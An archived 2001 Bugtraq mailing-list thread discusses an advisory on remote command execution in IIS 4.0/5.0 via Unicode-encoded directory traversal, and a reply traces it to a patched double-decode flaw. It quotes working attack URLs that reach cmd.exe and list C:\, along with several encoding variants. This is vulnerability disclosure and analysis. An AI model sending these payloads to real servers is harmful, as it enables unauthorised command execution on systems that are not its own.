Bugtraq mailing list archives

Re: New vulnerability in IIS4.0/5.0

From: Dave Ahmad <da () securityfocus com>
Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)


This seems to be just be another way to exploit the double decode
vulnerability (Bugtraq ID 2708).  There is a possibility that it may be a
new issue due to the use of '%u' method of encoding.  It does not look
that way to us.

On our test machines (and at eEye), systems do not seem to be vulnerable
after applying the MS01-026 hotfix (or the MS01-044 patch).

Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
attack string:

The attack string used successfully against an IIS server (Win2K, SP2):

http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c
+dir+c:\

first decode sequence(it replaces %u0025 with %)
http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

second decode sequence (it replaces %u005c with /)
http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

The double decode vulnerability is fixed in MS01-026.   I believe the fix
is included in the cumulative patch released with MS01-044.

It doesn't look like a new vulnerability, but we are awaiting confirmation
from Microsoft.

Has anyone managed to exploit a patched system?

Thanks Ryan & eEye.

Regards,

Dave Ahmad
Security Focus
www.securityfocus.com

On Wed, 19 Sep 2001, ALife // BERG wrote:

-----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------

             Remote users can execute any command on several
               IIS 4.0 and 5.0 systems by using UTF codes

-------------------------------------[ security.instock.ru ]--------------

Topic:              Remote users can execute any command on several
                    IIS 4.0 and 5.0 systems by using UTF codes

Announced:          2001-09-19
Credits:            ALife <buginfo () inbox ru>
Affects:            Microsoft IIS 4.0/5.0

--------------------------------------------------------------------------

---[ Description

     For  example, target has a virtual executable directory (e.g.
"scripts") that is located on the same driver of Windows system.
Submit request like this:

http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

Directory list of C:\ will be revealed.

Of course, same effect can be achieved by this kind of  processing
to  '/'  and  '.'. For  example:  "..%u002f", ".%u002e/", "..%u00255c",
"..%u0025%u005c" ...

Note: Attacker can run commands of IUSR_machinename account privilege
      only.

Current thread:

New vulnerability in IIS4.0/5.0 ALife // BERG (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 Dave Ahmad (Sep 19)
  - Re: New vulnerability in IIS4.0/5.0 César González (Sep 19)
    - ICQ WEB Portal multiple Cross Site Scripting vulnerability acz [iSecureLabs] (Sep 20)
  - Re: New vulnerability in IIS4.0/5.0 Paul McGovern (Sep 21)
- Re: New vulnerability in IIS4.0/5.0 C?sar Gonz?lez (Sep 19)
- <Possible follow-ups>
- RE: New vulnerability in IIS4.0/5.0 Microsoft Security Response Center (Sep 20)